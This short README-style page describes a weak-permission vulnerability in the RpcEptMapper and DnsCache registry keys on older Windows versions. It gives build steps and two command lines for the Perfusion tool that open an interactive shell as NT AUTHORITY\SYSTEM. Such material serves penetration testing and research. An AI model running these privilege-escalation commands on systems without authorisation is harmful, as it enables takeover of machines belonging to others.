👾 Overview
Windows 7, Windows Server 2008R2, Windows 8, and Windows Server 2012 have a vulnerability where the RpcEptMapper
and DnsCache
registry keys are configured with weak permissions. This allows any user to load a DLL as system.
💾 Installation
- Clone the repository
- Build the solution as release in Visual Studio
⏯️ Usage
The easiest way to use the tool is to launch an interactive system shell.
# Using Perfusion to get an interactive shell as NT AUTHORITY\SYSTEM
.\Perfusion.exe -c cmd -i
# Use this option on Windows 7 or Windows 2008 R2 if the prior command fails to target a different vulnerable key
.\Perfusion.exe -k Dnscache -c cmd -i
📝 Resources
🔗 Hyperlink | ℹ️ Info |
---|---|
Perfusion | Tool to exploit RpcEptMapper Vulnerability |
PrivescCheck | Windows privesc script |
itm4n’s Blog | Blog explaining the RpcEptMapper Vulnerability and the development of Perfusion |